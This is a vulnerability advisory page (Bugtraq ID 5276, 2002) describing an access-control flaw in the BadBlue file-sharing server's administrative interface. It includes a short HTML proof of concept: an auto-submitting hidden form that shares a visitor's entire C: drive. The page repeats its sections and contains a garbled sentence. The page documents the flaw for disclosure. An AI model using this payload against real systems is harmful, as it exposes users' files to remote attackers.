Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
BID:5276
Info
Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
| Bugtraq ID: | 5276 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 20 2002 12:00AM |
| Updated: | Jul 20 2002 12:00AM |
| Credit: | Vulnerability discovery credited to Matthew Murphy <[email protected]>. |
| Vulnerable: |
Working Resources Inc. BadBlue Enterprise Edition 1.7.4 Working Resources Inc. BadBlue Enterprise Edition 1.7.3 Working Resources Inc. BadBlue Enterprise Edition 1.7.2 Working Resources Inc. BadBlue Enterprise Edition 1.7 |
| Not Vulnerable: | |
Discussion
Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
BadBlue is a P2P file sharing application distributed by Working Resources. It is available for Microsoft Windows operating systems.
BadBlue does not sufficiently control access to the administrative interface. It is possible to remotely add the entire drive of a system running a vulnerable BadBlue implementation via a maliciously crafted web page containing a form POST method. This would allow remote users to via the contents of the drive with the privileges of the BadBlue server.
BadBlue is a P2P file sharing application distributed by Working Resources. It is available for Microsoft Windows operating systems.
BadBlue does not sufficiently control access to the administrative interface. It is possible to remotely add the entire drive of a system running a vulnerable BadBlue implementation via a maliciously crafted web page containing a form POST method. This would allow remote users to via the contents of the drive with the privileges of the BadBlue server.
Exploit / POC
Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
The following exploit code was contributed by Matthew Murphy <[email protected]>:
<HTML>
<HEAD>
<FORM ACTION=http://localhost/ext.dll METHOD=GET>
<INPUT TYPE=hidden NAME=MfcISAPICommand VALUE=LoadPage>
<INPUT TYPE=hidden NAME=page VALUE=dir.hts>
<INPUT TYPE=hidden NAME=a0 VALUE=add>
<INPUT TYPE=hidden NAME=a2 VALUE=hd>
<INPUT TYPE=hidden NAME=a1 VALUE=C:\>
</FORM>
</HEAD>
<BODY ONLOAD="document.forms(0).submit()" />
</HTML>
The following exploit code was contributed by Matthew Murphy <[email protected]>:
<HTML>
<HEAD>
<FORM ACTION=http://localhost/ext.dll METHOD=GET>
<INPUT TYPE=hidden NAME=MfcISAPICommand VALUE=LoadPage>
<INPUT TYPE=hidden NAME=page VALUE=dir.hts>
<INPUT TYPE=hidden NAME=a0 VALUE=add>
<INPUT TYPE=hidden NAME=a2 VALUE=hd>
<INPUT TYPE=hidden NAME=a1 VALUE=C:\>
</FORM>
</HEAD>
<BODY ONLOAD="document.forms(0).submit()" />
</HTML>
Solution / Fix
Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
References:
References: